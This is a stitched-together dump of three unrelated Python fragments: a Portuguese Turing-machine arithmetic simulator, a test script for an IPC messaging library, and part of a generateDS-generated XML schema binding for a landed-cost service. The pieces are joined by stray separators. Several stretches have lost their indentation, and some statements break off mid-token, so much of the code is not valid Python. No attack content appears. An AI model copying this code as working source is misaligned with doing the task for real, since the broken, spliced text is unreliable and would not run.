    print("Estado Atual | Leu | Posicao | Escreveu | Direcao | Proximo Estado")
    print("\n")
    i = 0
    # for i in range(len(res)):
    for i, item in enumerate(res):
        if res[i] == "*" and estado == "q0":
            # q0: skip over the first operand, moving right (D).
            print("\tq0\t "+res[i]+"\t "+str(i) +
                  "\t * "+" \t D \t\t q0")
            print("\n")
            continue
        elif res[i] == " " and estado == "q0":
            # q0 -> q1: fill the separator blank with a '*'.
            print("\tq0\t "+res[i]+"\t "+str(i) +
                  "\t * "+" \t D \t\t q1")
            print("\n")
            res[i] = "*"
            estado = "q1"
            continue
        elif res[i] == "*" and estado == "q1":
            # q1: skip over the second operand, moving right (D).
            print("\tq1\t "+res[i]+"\t "+str(i) +
                  "\t * "+" \t D \t\t q1")
            print("\n")
            continue
        elif res[i] == " " and estado == "q1":
            # q1 -> q2: erase the last '*' (one cell left, E) and halt.
            print("\tq1\t "+res[i]+"\t "+str(i) +
                  "\t "+" \t E \t\t q2")
            print("\n")
            res[i - 1] = " "
            estado = "q2"
            print("\tq2\t "+res[i]+"\t "+str(i - 1) +
                  "\t "+" \t FIM \t\t q2")
            break
    print("\n")
    print("\n")
    result = ''.join(res)
    print("Resultado: " + result)
# **********************************************************************
def multiplicacao(self):
# **********************************************************************
numero1 = self.getInputData()
numero2 = self.getInputData()
operador1 = ""
operador2 = ""
for i in numero1:
operador1 += "*"
for i in numero2:
operador2 += "*"
res = operador1 + " " + operador2 + " "
print("\n\t\t_____________________MULTIPLICACAO______________________________")
print("\n")
print("Valores : " + res)
res = list(res)
estado = "q0"
i = 0
print("Estado Atual | Leu | Posicao | Escreveu | Direcao | Proximo Estado")
print("\n")
while i != -2:
if res[i] == "*" and estado == "q0":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q1")
print("\n")
i += 1
elif res[i] == " " and estado == "q0":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q10")
print("\n")
estado = "q10"
i += 1
elif res[i] == "*" and estado == "q1":
print("\tq0\t "+res[i]+"\t "+str(i) +
"\t * "+" \t D \t\t q1")
print("\n")
i += 1
elif res[i] == " " and estado == "q1":
| |
<filename>test/test.py
# To run:
# gmake install in $IPC_DIR/python
# export PYTHONPATH="$IPC_DIR/python:$IPC_DIR/lib/$SYS"
# where IPC_DIR is the location of IPC and SYS is the system type
# (e.g., Linux-3.8)
# Run $IPC_DIR/bin/$SYS/central in a separate terminal
# export CENTRALHOST=localhost
# python
# import test; test.main()
# Follow the instructions (you need to enter input and start/stop the
# $IPC_DIR/test/module2 program (which needs to be built first)
# You can then compare the output against test.py.output.
# Except for differences in pointer values, and occasional swaps in which
# handler fires first, they should be identical
from primFmttrs import *
from formatters import *
from _IPC import *
from IPC import *
# Global switch: when True, printVC dumps the marshalled bytes.
printByteArrayP = True

def printVC(vc):
    """Print the raw byte content of an IPC var-content, if enabled."""
    if not printByteArrayP:
        return
    printByteArray(vc.content, vc.length)
class sample0(IPCdata) :
    # Two double-valued slots used by test0: d1 is encoded, d2 receives
    # the decoded value.
    _fields = ('d1', 'd2')
class sample1(IPCdata) :
    # Two char-valued slots used by test1: c1 is encoded, c2 receives
    # the decoded value.
    _fields = ('c1', 'c2')
def test0 () :
    """Round-trip a double through DOUBLE_Trans: object field, then list element."""
    IPC_initialize()
    buf = createBuffer(createByteArray(10))
    ds = sample0()
    ds.d1 = 666.0
    it = DOUBLE_Trans()
    # Encode field 0 (d1) into the buffer, then decode back into field 1 (d2).
    it.Encode(ds, 0, buf)
    printBuffer(buf)
    rewindBuffer(buf)
    it.Decode(ds, 1, buf)
    print(ds.d2)
    print(it.ELength(ds, 1))
    print(it.SimpleType())
    # Same round trip on a list: encode element 1, decode into element 2.
    ar = [1, 2, 3]
    rewindBuffer(buf)
    it.EncodeElement(ar, 1, buf)
    printBuffer(buf)
    rewindBuffer(buf)
    it.DecodeElement(ar, 2, buf)
    print(ar)
def test1 () :
    """Round-trip a char through CHAR_Trans: object field, then list element."""
    IPC_initialize()
    buf = createBuffer(createByteArray(10))
    ds = sample1()
    ds.c1 = 'h'
    st = CHAR_Trans()
    # Encode field 0 (c1) into the buffer, then decode back into field 1 (c2).
    st.Encode(ds, 0, buf)
    printBuffer(buf)
    rewindBuffer(buf)
    st.Decode(ds, 1, buf)
    print(ds.c2)
    print(st.ELength(ds, 1))
    print(st.SimpleType())
    # Same round trip on a list: encode element 1, decode into element 2.
    ar = ['e', 'm', 'c']
    rewindBuffer(buf)
    st.EncodeElement(ar, 1, buf)
    printBuffer(buf)
    rewindBuffer(buf)
    st.DecodeElement(ar, 2, buf)
    print(ar)
# This tests all the primitives
def test2 () :
    """Marshall/unmarshall every primitive format, printing bytes and values."""
    IPC_initialize()
    # int
    fmt1 = IPC_parseFormat("int")
    vc1 = IPC_VARCONTENT_TYPE()
    IPC_marshall(fmt1, 123, vc1)
    printVC(vc1)
    print(IPC_unmarshallData(fmt1, vc1.content, int))
    # boolean
    vc3 = IPC_VARCONTENT_TYPE()
    fmt3 = IPC_parseFormat("boolean")
    IPC_marshall(fmt3, True, vc3)
    printVC(vc3)
    print(IPC_unmarshallData(fmt3, vc3.content, bool))
    # float
    vc4 = IPC_VARCONTENT_TYPE()
    fmt4 = IPC_parseFormat("float")
    IPC_marshall(fmt4, 55.0, vc4)
    printVC(vc4)
    print(IPC_unmarshallData(fmt4, vc4.content, float))
    # double
    vc2 = IPC_VARCONTENT_TYPE()
    fmt2 = IPC_parseFormat("double")
    IPC_marshall(fmt2, 666.0, vc2)
    printVC(vc2)
    print(IPC_unmarshallData(fmt2, vc2.content, float))
    # byte (signed) and ubyte (unsigned)
    vc5 = IPC_VARCONTENT_TYPE()
    fmt5 = IPC_parseFormat("byte")
    IPC_marshall(fmt5, 0XA, vc5)
    printVC(vc5)
    print(IPC_unmarshallData(fmt5, vc5.content, int))
    vc5 = IPC_VARCONTENT_TYPE()
    fmt5 = IPC_parseFormat("ubyte")
    IPC_marshall(fmt5, 0XFA, vc5)
    printVC(vc5)
    print(IPC_unmarshallData(fmt5, vc5.content, int))
    # string (non-empty, then empty)
    vc6 = IPC_VARCONTENT_TYPE()
    fmt6 = IPC_parseFormat("string")
    IPC_marshall(fmt6, "hello", vc6)
    printVC(vc6)
    print(IPC_unmarshallData(fmt6, vc6.content, str))
    vc6 = IPC_VARCONTENT_TYPE()
    fmt6 = IPC_parseFormat("string")
    IPC_marshall(fmt6, "", vc6)
    printVC(vc6)
    print(IPC_unmarshallData(fmt6, vc6.content, str))
    # The None-string case is left disabled.
    # vc6 = IPC_VARCONTENT_TYPE()
    # fmt6 = IPC_parseFormat("string")
    # IPC_marshall(fmt6, None, vc6)
    # printVC(vc6)
    # print(IPC_unmarshallData(fmt6, vc6.content, str))
    # char
    vc7 = IPC_VARCONTENT_TYPE()
    fmt7 = IPC_parseFormat("char")
    IPC_marshall(fmt7, 'c', vc7)
    printVC(vc7)
    print(IPC_unmarshallData(fmt7, vc7.content, str))
    # short
    vc8 = IPC_VARCONTENT_TYPE()
    fmt8 = IPC_parseFormat("short")
    IPC_marshall(fmt8, 666, vc8)
    printVC(vc8)
    print(IPC_unmarshallData(fmt8, vc8.content, int))
    # long (max positive 32-bit value)
    vc9 = IPC_VARCONTENT_TYPE()
    fmt9 = IPC_parseFormat("long")
    IPC_marshall(fmt9, 0X7FFFFFFF, vc9)
    printVC(vc9)
    print(IPC_unmarshallData(fmt9, vc9.content, int))
class struct1(IPCdata) :
    # Matches format "{int, {string, double}}": an int plus a nested
    # struct2 (the ('a1', 'struct2') pair names the field and its type).
    _fields = ('i', ('a1', 'struct2'))
class struct2(IPCdata) :
    # Matches format "{string, double}".
    _fields = ('str', 'd')
# test structures
def test3 () :
    """Marshall/unmarshall nested structures, via generic and typed classes."""
    IPC_initialize()
    fmt1 = IPC_parseFormat("{int, {string, double}}")
    vc1 = IPC_VARCONTENT_TYPE()
    # Generic IPCdata uses positional _f0/_f1 attribute names.
    ds = IPCdata()
    ds._f0 = 666
    ds._f1 = IPCdata();
    ds._f1._f0 = "hello"; ds._f1._f1 = 3.14159
    IPC_marshall(fmt1, ds, vc1)
    printVC(vc1)
    print(IPC_unmarshallData(fmt1, vc1.content, struct1))
    # Same format using the named struct1/struct2 classes.
    ds1 = struct1()
    ds2 = struct2()
    ds1.i = 1234; ds1.a1 = ds2
    ds2.str = "eat more spam"; ds2.d = 9.87654321
    IPC_marshall(fmt1, ds1, vc1)
    printVC(vc1)
    ds1a = struct1()
    ret = IPC_unmarshall(fmt1, vc1.content, ds1a)
    print(ds1a, ret, ds1 == ds1a, ds2 == ds1a.a1)
    # Unmarshalling into a class with the wrong shape should fail.
    # Should raise an error
    try: IPC_unmarshall(fmt1, vc1.content, ds2)
    except Exception as e : print(e)
# test fixed arrays
def test4 () :
    """Marshall/unmarshall fixed-size arrays: 1-D, array-of-struct, 2-D."""
    IPC_initialize()
    # 1-D int array of length 5.
    fmt1 = IPC_parseFormat("[int :5]")
    vc1 = IPC_VARCONTENT_TYPE()
    ds1 = list(range(10,15))
    IPC_marshall(fmt1, ds1, vc1)
    printVC(vc1)
    ds1a = [None]*5
    IPC_unmarshall(fmt1, vc1.content, ds1a)
    print(ds1a)
    # Array of 5 {string, double} structs.
    fmt2 = IPC_parseFormat("[{string, double} :5]")
    vc2 = IPC_VARCONTENT_TYPE()
    ds2 = [None]*5
    foo = ('eat', 'more', 'spam', 'for', 'life')
    for i in range(0,5) :
        ds2[i] = struct2()
        ds2[i].str = foo[i]
        ds2[i].d = float(pow(i,3))
    IPC_marshall(fmt2, ds2, vc2)
    printVC(vc2)
    print(IPC_unmarshallData(fmt2, vc2.content, struct2))
    # 3x4 int matrix, unmarshalled into a pre-shaped nested list.
    fmt3 = IPC_parseFormat("[int : 3, 4]")
    vc3 = IPC_VARCONT
class struct4(IPCdata) :
_fields = ('num', 'ar')
class struct5(IPCdata) :
_fields = (('ar', 'struct2'), 'num')
class struct6(IPCdata) :
_fields = ('dim1', 'dim2', 'ar')
# test variable arrays
def test5 () :
IPC_initialize()
fmt1 = IPC_parseFormat("{int, <int :1>}")
vc1 = IPC_VARCONTENT_TYPE()
ds1 = struct4(); ds1a = struct4()
ds1.num = 5; ds1.ar = list(range(111,116))
IPC_marshall(fmt1, ds1, vc1)
printVC(vc1)
IPC_unmarshall(fmt1, vc1.content, ds1a)
print(ds1a)
fmt2 = IPC_parseFormat("{<{string, double} :2>, int}")
vc2 = IPC_VARCONTENT_TYPE()
ds2 = struct5()
ds2.ar = [None]*5; ds2.num = 5
foo = ('eat', 'more', 'spam', 'for', 'life')
for i in range(0,5) :
ds2.ar[i] = struct2()
ds2.ar[i].str = foo[i]
ds2.ar[i].d = float(pow(i,3))
IPC_marshall(fmt2, ds2, vc2)
printVC(vc2)
print(IPC_unmarshallData(fmt2, vc2.content, struct5))
fmt3 = IPC_parseFormat("{int, int, <int : 1, 2>}")
vc3 = IPC_VARCONTENT_TYPE()
ds3 = struct6()
ds3.dim1 = 3; ds3.dim2 = 4; ds3.ar = [None]*ds3.dim1
for i in range(0, 3) :
ds3.ar[i] = list(range(pow(i+1,2), pow(i+1,2)+ds3.dim2))
IPC_marshall(fmt3, ds3, vc3)
printVC(vc3)
ds3a = struct6();
IPC_unmarshall(fmt3, vc3.content, ds3a)
print(ds3a)
print(IPC_unmarshallData(fmt3, vc3.content, struct6))
# Stand-in for enumerated type
WaitVal = 0; SendVal = 1; ReceiveVal = 2; ListenVal = 3
class struct7(IPCdata) :
_fields = ('i1', 'status')
# test enums
def test6 () :
IPC_initialize()
fmt1 = IPC_parseFormat("{int, {enum WaitVal, SendVal, ReceiveVal, ListenVal}}")
vc1 = IPC_VARCONTENT_TYPE()
ds1 = struct7(); ds1a = struct7()
ds1.i1 = 42; ds1.status = ReceiveVal
IPC_marshall(fmt1, ds1, vc1)
printVC(vc1)
IPC_unmarshall(fmt1, vc1.content, ds1a)
print(ds1a)
fmt2 = IPC_parseFormat("[{enum WaitVal, SendVal, ReceiveVal, ListenVal}: 3]")
vc2 = IPC_VARCONTENT_TYPE()
ds2 = [None]*3; ds2[0] = SendVal; ds2[1] = ListenVal; ds2[2] = WaitVal;
IPC_marshall(fmt2, ds2, vc2)
printVC(vc2)
print(IPC_unmarshallData(fmt2, vc2.content, struct7))
fmt3 = IPC_parseFormat("{int, {enum : 4}}")
vc3 = IPC_VARCONTENT_TYPE()
ds3 = struct7(); ds3.i1 = 42; ds3.status = ReceiveVal
IPC_marshall(fmt3, ds3, vc3)
printVC(vc3)
print(IPC_unmarshallData(fmt3, vc3.content, struct7))
# test pointers
def test7 () :
IPC_initialize()
fmt1 = IPC_parseFormat("{int, {string, double}}")
vc1 = IPC_VARCONTENT_TYPE()
ds1 = struct1(); ds1a = struct1()
ds1.i = 666; ds1.a1 = struct2();
ds1.a1.str = "hello"; ds1.a1.d = 3.14159
IPC_marshall(fmt1, ds1, vc1)
printVC(vc1)
IPC_unmarshall(fmt1, vc1.content, ds1a)
print(ds1a)
fmt2 = IPC_parseFormat("{*int, *{string, double}}")
vc2 = IPC_VARCONTENT_TYPE()
ds2 = struct1(); ds2a = struct1()
ds2.i = 666; ds2.a1 = struct2();
ds2.a1.str = "hello"; ds2.a1.d = 3.14159
IPC_marshall(fmt2, ds2, vc2)
printVC(vc2)
IPC_unmarshall(fmt2, vc2.content, ds2a)
print(ds2a)
fmt3 = fmt2
vc3 = IPC_VARCONTENT_TYPE()
ds3 = struct1()
ds3.i = 666; ds3.a1 = None
IPC_marshall(fmt3, ds3, vc3)
printVC(vc3)
print(IPC_unmarshallData(fmt3, vc3.content, struct1))
# test named formatters
# Need to be connected to IPC central to test this...
def test8 () :
IPC_initialize()
print(IPC_parseFormat(""))
print(IPC_parseFormat(None))
def msgHandler1 (msgInstance, data, clientData) :
print('msgHandler1:', IPC_msgInstanceName(msgInstance), data, clientData)
def msgHandler2 (msgInstance, data, clientData) :
print('msgHandler2:', IPC_msgInstanceName(msgInstance), data, clientData, \
IPC_dataLength(msgInstance))
def test9 () :
IPC_connect("test")
IPC_defineMsg("f", IPC_VARIABLE_LENGTH, "int")
IPC_msgClass("f", int)
IPC_subscribeData("f", msgHandler1, 1)
IPC_listenWait(100) # Seems to be a timing issue here, sometimes
IPC_publishData("f", 42)
IPC_listenWait(500)
print
IPC_subscribeData("f", msgHandler2, 3)
IPC_publishData("f", 666)
IPC_listenWait(500)
print
IPC_subscribeData("f", msgHandler1, 2)
print("Num handlers:", IPC_numHandlers("f"))
IPC_publishData("f", 1234)
IPC_listenWait(500)
print
IPC_unsubscribe("f", msgHandler2)
print("Num handlers:", IPC_numHandlers("f"))
vc = IPC_VARCONTENT_TYPE()
IPC_marshall(IPC_msgFormatter("f"), 4321, vc)
IPC_publishVC("f", vc)
IPC_listenWait(500)
IPC_disconnect()
# NOTE(review): 'exit' shadows the builtin, but test10 shares this
# module-level flag by name, so the name is kept for compatibility.
exit = False
def stdinHnd (fd, clientData) :
    """Console-input handler: 'h'/'?' prints help, 'q' quits, 'u' mutes.

    Fix: guard against EOF -- sys.stdin.readline() returns '' at EOF, in
    which case the original ``msg[0]`` raised IndexError inside the IPC
    file-descriptor callback.
    """
    global exit
    msg = sys.stdin.readline()
    if not msg:
        # EOF on stdin: nothing to handle.
        return
    if (msg[0] in ('?', 'h')) :
        print("h: help")
        print("q: quit")
        print("u: stop listening")
    elif (msg[0] == 'q') :
        print("quit")
        exit = True
    elif (msg[0] == 'u') :
        print("Silent")
        IPC_unsubscribeFD(fd, stdinHnd)
    else :
        print("Unhandled input:", msg)
def test10 () :
    """Interactive test: wire stdinHnd to stdin and listen until 'q' sets
    the module-level 'exit' flag."""
    global exit
    IPC_connect("test")
    IPC_subscribeFD(sys.stdin.fileno(), stdinHnd)
    exit = False
    print("Please type -- either 'h' or 'q', end with a 'q'")
    while (not exit) : IPC_listen(1000)
    IPC_disconnect()
def test11 () :
    """Exercise misc API calls: perror, capacity, queue length, priority,
    verbosity.

    NOTE(review): the defineMsg/disconnect after the first disconnect
    presumably exercise the not-connected error paths -- confirm.
    """
    IPC_connect("test")
    IPC_perror("Test")
    IPC_setCapacity(3)
    IPC_defineMsg("f", IPC_VARIABLE_LENGTH, "int")
    IPC_setMsgQueueLength("f", 1)
    IPC_setMsgPriority("f", 2)
    IPC_setVerbosity(IPC_Print_Errors)
    IPC_disconnect()
    IPC_defineMsg("h", IPC_VARIABLE_LENGTH, "int")
    IPC_disconnect()
def test12 () :
    """Exercise subscribeData, including re-subscribing the same handler
    and subscribing to "g", which is never defined here (presumably an
    error-path check -- confirm against the IPC library semantics)."""
    IPC_connect("test")
    IPC_defineMsg("f", IPC_VARIABLE_LENGTH, "int")
    IPC_defineMsg("h", IPC_VARIABLE_LENGTH, "int")
    IPC_subscribeData("f", msgHandler1, 1)
    IPC_subscribeData("f", msgHandler1, 2)
    IPC_subscribeData("g", msgHandler1, 1)
    IPC_disconnect()
def msgHandler3 (msgInstance, byteArray, clientData) :
    # Raw (unmarshalled) subscriber: decode the byte array using message
    # "g"'s formatter, then free the buffer explicitly.
    (data, retVal) = IPC_unmarshallData(IPC_msgFormatter("g"), byteArray, int)
    print('msgHandler3:', IPC_msgInstanceName(msgInstance), data, clientData, \
          IPC_dataLength(msgInstance))
    IPC_freeByteArray(byteArray)
def test13 () :
    """Exercise a raw subscriber on a fixed-length message plus the three
    publish variants: publish, publishVC, and publishFixed."""
    IPC_connect("test")
    IPC_defineMsg("f", 4, None)
    IPC_subscribe("f", msgHandler3) # optional client data
    IPC_defineMsg("g", IPC_VARIABLE_LENGTH, "int")
    IPC_listenWait(100); # Seems to be a timing issue here, sometimes
    vc = IPC_VARCONTENT_TYPE()
    IPC_marshall(IPC_parseFormat("int"), 1234, vc)
    IPC_publish("f", vc.length, vc.content)
    IPC_listenWait(500)
    IPC_publishVC("f", vc)
    IPC_listenWait(500)
    IPC_publishFixed("f", vc.content)
    IPC_listenWait(500)
    IPC_disconnect()
# Flags set by the connect/disconnect handlers below.
connected = False
disconnected = False
def connectHandler1 (moduleName, clientData) :
    # Records that a module connected, then logs it.
    global connected
    connected = True
    print("connectHandler1:", moduleName, clientData)
def connectHandler2 (moduleName, clientData) :
    # Secondary connect callback; just logs.
    print("connectHandler2:", moduleName, clientData)
def disconnectHandler1 (moduleName, clientData) :
    # Records that a module disconnected, then logs it.
    global disconnected
    disconnected = True
    print("disconnectHandler1:", moduleName, clientData)
def disconnectHandler2 (moduleName, clientData) :
print("disconnectHandler2:", moduleName, | |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated Sat Mar 7 09:04:16 2020 by generateDS.py version 2.35.15.
# Python 3.8.1 (v3.8.1:1b293b6006, Dec 18 2019, 14:08:53) [Clang 6.0 (clang-600.0.57)]
#
# Command line options:
# ('--no-namespace-defs', '')
# ('-o', './python/landed_cost_web_service_schema.py')
#
# Command line arguments:
# ./schemas/LandedCostWebServiceSchema.xsd
#
# Command line:
# /Users/danielkobina/Documents/Open/.env/bin/generateDS --no-namespace-defs -o "./python/landed_cost_web_service_schema.py" ./schemas/LandedCostWebServiceSchema.xsd
#
# Current working directory (os.getcwd()):
# 2020-03
#
from six.moves import zip_longest
import os
import sys
import re as re_
import base64
import datetime as datetime_
import decimal as decimal_
try:
from lxml import etree as etree_
except ImportError:
from xml.etree import ElementTree as etree_
Validate_simpletypes_ = True
SaveElementTreeNode = True
if sys.version_info.major == 2:
BaseStrType_ = basestring
else:
BaseStrType_ = str
def parsexml_(infile, parser=None, **kwargs):
    """Parse an XML document from a file name, path, or file-like object.

    Prefers lxml's ElementTree-compatible parser (which ignores comment
    nodes) when lxml is available; otherwise falls back to the stock
    xml.etree parser.  Extra keyword arguments go to ``etree_.parse``.
    """
    if parser is None:
        # ETCompatXMLParser exists only on lxml; plain xml.etree raises
        # AttributeError, in which case we use its default XMLParser.
        try:
            parser = etree_.ETCompatXMLParser()
        except AttributeError:
            parser = etree_.XMLParser()
    # On Pythons that have os.PathLike (3.6+), convert path-like objects
    # to plain strings; os.path.join on one argument is just that.
    if hasattr(os, 'PathLike') and isinstance(infile, os.PathLike):
        infile = os.path.join(infile)
    return etree_.parse(infile, parser=parser, **kwargs)
def parsexmlstring_(instring, parser=None, **kwargs):
    """Parse an XML document from a string and return its root element.

    Mirrors parsexml_: prefers lxml's comment-ignoring compatible parser,
    falling back to xml.etree's XMLParser when lxml is absent.
    """
    if parser is None:
        # ETCompatXMLParser is lxml-only; fall back on AttributeError.
        try:
            parser = etree_.ETCompatXMLParser()
        except AttributeError:
            parser = etree_.XMLParser()
    return etree_.fromstring(instring, parser=parser, **kwargs)
#
# Namespace prefix definition table (and other attributes, too)
#
# The module generatedsnamespaces, if it is importable, must contain
# a dictionary named GeneratedsNamespaceDefs. This Python dictionary
# should map element type names (strings) to XML schema namespace prefix
# definitions. The export method for any class for which there is
# a namespace prefix definition, will export that definition in the
# XML representation of that element. See the export method of
# any generated element type class for an example of the use of this
# table.
# A sample table is:
#
# # File: generatedsnamespaces.py
#
# GenerateDSNamespaceDefs = {
# "ElementtypeA": "http://www.xxx.com/namespaceA",
# "ElementtypeB": "http://www.xxx.com/namespaceB",
# }
#
# Additionally, the generatedsnamespaces module can contain a python
# dictionary named GenerateDSNamespaceTypePrefixes that associates element
# types with the namespace prefixes that are to be added to the
# "xsi:type" attribute value. See the exportAttributes method of
# any generated element type and the generation of "xsi:type" for an
# example of the use of this table.
# An example table:
#
# # File: generatedsnamespaces.py
#
# GenerateDSNamespaceTypePrefixes = {
# "ElementtypeC": "aaa:",
# "ElementtypeD": "bbb:",
# }
#
try:
from generatedsnamespaces import GenerateDSNamespaceDefs as GenerateDSNamespaceDefs_
except ImportError:
GenerateDSNamespaceDefs_ = {}
try:
from generatedsnamespaces import GenerateDSNamespaceTypePrefixes as GenerateDSNamespaceTypePrefixes_
except ImportError:
GenerateDSNamespaceTypePrefixes_ = {}
#
# You can replace the following class definition by defining an
# importable module named "generatedscollector" containing a class
# named "GdsCollector". See the default class definition below for
# clues about the possible content of that class.
#
try:
    from generatedscollector import GdsCollector as GdsCollector_
except ImportError:

    class GdsCollector_(object):
        """Fallback collector that accumulates validation warning messages."""

        def __init__(self, messages=None):
            # Never share a default list between instances.
            self.messages = [] if messages is None else messages

        def add_message(self, msg):
            """Append one warning message."""
            self.messages.append(msg)

        def get_messages(self):
            """Return the list of collected messages."""
            return self.messages

        def clear_messages(self):
            """Discard all collected messages."""
            self.messages = []

        def print_messages(self):
            """Print each message to stdout, prefixed with 'Warning: '."""
            for msg in self.messages:
                print("Warning: {}".format(msg))

        def write_messages(self, outstream):
            """Write each message to *outstream*, one per line."""
            for msg in self.messages:
                outstream.write("Warning: {}\n".format(msg))
#
# The super-class for enum types
#
try:
from enum import Enum
except ImportError:
Enum = object
#
# The root super-class for element type classes
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
try:
from generatedssuper import GeneratedsSuper
except ImportError as exp:
class GeneratedsSuper(object):
__hash__ = object.__hash__
tzoff_pattern = re_.compile(r'(\+|-)((0\d|1[0-3]):[0-5]\d|14:00)$')
        class _FixedOffsetTZ(datetime_.tzinfo):
            # Minimal tzinfo with a constant UTC offset; used when parsing
            # timezone suffixes on xsd:dateTime values.
            def __init__(self, offset, name):
                # offset is in minutes east of UTC.
                self.__offset = datetime_.timedelta(minutes=offset)
                self.__name = name
            def utcoffset(self, dt):
                return self.__offset
            def tzname(self, dt):
                return self.__name
            def dst(self, dt):
                # DST is unknown for a fixed offset.
                return None
        def gds_format_string(self, input_data, input_name=''):
            """Return the string value unchanged for XML output."""
            return input_data
        def gds_parse_string(self, input_data, node=None, input_name=''):
            """Return the string value unchanged; no parsing required."""
            return input_data
def gds_validate_string(self, input_data, node=None, input_name=''):
if not input_data:
return ''
else:
return input_data
        def gds_format_base64(self, input_data, input_name=''):
            """Base64-encode *input_data* (bytes) for XML output."""
            return base64.b64encode(input_data)
        def gds_validate_base64(self, input_data, node=None, input_name=''):
            """Return the value unchanged; no validation performed."""
            return input_data
        def gds_format_integer(self, input_data, input_name=''):
            """Format an integer for XML output ('%d')."""
            return '%d' % input_data
        def gds_parse_integer(self, input_data, node=None, input_name=''):
            """Parse *input_data* as int; report a parse error on failure."""
            try:
                ival = int(input_data)
            except (TypeError, ValueError) as exp:
                raise_parse_error(node, 'Requires integer value: %s' % exp)
            return ival
        def gds_validate_integer(self, input_data, node=None, input_name=''):
            """Check *input_data* converts to int; report a parse error
            otherwise.  Returns the converted int value."""
            try:
                value = int(input_data)
            except (TypeError, ValueError):
                raise_parse_error(node, 'Requires integer value')
            return value
def gds_format_integer_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_integer_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
int(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of integer valuess')
return values
        def gds_format_float(self, input_data, input_name=''):
            """Format a float with up to 15 fractional digits, trailing
            zeros stripped.

            NOTE(review): integral values come out with a trailing '.'
            (e.g. 1.0 -> '1.') because only '0' characters are stripped --
            confirm downstream consumers accept that before changing it.
            """
            return ('%.15f' % input_data).rstrip('0')
        def gds_parse_float(self, input_data, node=None, input_name=''):
            """Parse *input_data* as float; report a parse error on failure."""
            try:
                fval_ = float(input_data)
            except (TypeError, ValueError) as exp:
                raise_parse_error(node, 'Requires float or double value: %s' % exp)
            return fval_
        def gds_validate_float(self, input_data, node=None, input_name=''):
            """Check *input_data* converts to float; report a parse error
            otherwise.  Returns the converted float value."""
            try:
                value = float(input_data)
            except (TypeError, ValueError):
                raise_parse_error(node, 'Requires float value')
            return value
def gds_format_float_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
        def gds_validate_float_list(
                self, input_data, node=None, input_name=''):
            """Validate a space-separated list of floats; returns the
            token list, reporting a parse error on any bad token."""
            values = input_data.split()
            for value in values:
                try:
                    float(value)
                except (TypeError, ValueError):
                    raise_parse_error(node, 'Requires sequence of float values')
            return values
def gds_format_decimal(self, input_data, input_name=''):
return ('%s' % input_data).rstrip('0')
def gds_parse_decimal(self, input_data, node=None, input_name=''):
try:
decimal_value = decimal_.Decimal(input_data)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires decimal value')
return decimal_value
def gds_validate_decimal(self, input_data, node=None, input_name=''):
try:
value = decimal_.Decimal(input_data)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires decimal value')
return value
def gds_format_decimal_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
        def gds_validate_decimal_list(
                self, input_data, node=None, input_name=''):
            """Validate a space-separated list of decimals; returns the
            token list, reporting a parse error on any bad token.

            NOTE(review): Decimal raises InvalidOperation (not ValueError)
            for malformed tokens, so bad tokens escape this except clause
            -- same issue as gds_parse_decimal; confirm before relying on
            the reported error.
            """
            values = input_data.split()
            for value in values:
                try:
                    decimal_.Decimal(value)
                except (TypeError, ValueError):
                    raise_parse_error(node, 'Requires sequence of decimal values')
            return values
        def gds_format_double(self, input_data, input_name=''):
            """Format a double in exponent notation (printf '%e')."""
            return '%e' % input_data
        def gds_parse_double(self, input_data, node=None, input_name=''):
            """Parse *input_data* as float; report a parse error on failure."""
            try:
                fval_ = float(input_data)
            except (TypeError, ValueError) as exp:
                raise_parse_error(node, 'Requires double or float value: %s' % exp)
            return fval_
        def gds_validate_double(self, input_data, node=None, input_name=''):
            """Check *input_data* converts to float; report a parse error
            otherwise.  Returns the converted value."""
            try:
                value = float(input_data)
            except (TypeError, ValueError):
                raise_parse_error(node, 'Requires double or float value')
            return value
def gds_format_double_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
        def gds_validate_double_list(
                self, input_data, node=None, input_name=''):
            """Validate a space-separated list of doubles; returns the
            token list, reporting a parse error on any bad token."""
            values = input_data.split()
            for value in values:
                try:
                    float(value)
                except (TypeError, ValueError):
                    raise_parse_error(
                        node, 'Requires sequence of double or float values')
            return values
        def gds_format_boolean(self, input_data, input_name=''):
            """Render a boolean in xsd lexical form ('true'/'false')."""
            return ('%s' % input_data).lower()
        def gds_parse_boolean(self, input_data, node=None, input_name=''):
            """Parse an xsd:boolean lexical value ('true'/'1'/'false'/'0');
            report a parse error for anything else."""
            if input_data in ('true', '1'):
                bval = True
            elif input_data in ('false', '0'):
                bval = False
            else:
                raise_parse_error(node, 'Requires boolean value')
            return bval
        def gds_validate_boolean(self, input_data, node=None, input_name=''):
            """Check *input_data* is a Python boolean-ish value
            (True, 1, False, or 0); report a parse error otherwise."""
            if input_data not in (True, 1, False, 0, ):
                raise_parse_error(
                    node,
                    'Requires boolean value '
                    '(one of True, 1, False, 0)')
            return input_data
def gds_format_boolean_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_boolean_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
if value not in (True, 1, False, 0, ):
raise_parse_error(
node,
'Requires sequence of boolean values '
'(one of True, 1, False, 0)')
return values
        def gds_validate_datetime(self, input_data, node=None, input_name=''):
            """Return the value unchanged; no validation performed."""
            return input_data
        def gds_format_datetime(self, input_data, input_name=''):
            """Render a datetime in xsd:dateTime lexical form, appending a
            'Z' or '+hh:mm'/'-hh:mm' suffix when tzinfo is present."""
            if input_data.microsecond == 0:
                _svalue = '%04d-%02d-%02dT%02d:%02d:%02d' % (
                    input_data.year,
                    input_data.month,
                    input_data.day,
                    input_data.hour,
                    input_data.minute,
                    input_data.second,
                )
            else:
                _svalue = '%04d-%02d-%02dT%02d:%02d:%02d.%s' % (
                    input_data.year,
                    input_data.month,
                    input_data.day,
                    input_data.hour,
                    input_data.minute,
                    input_data.second,
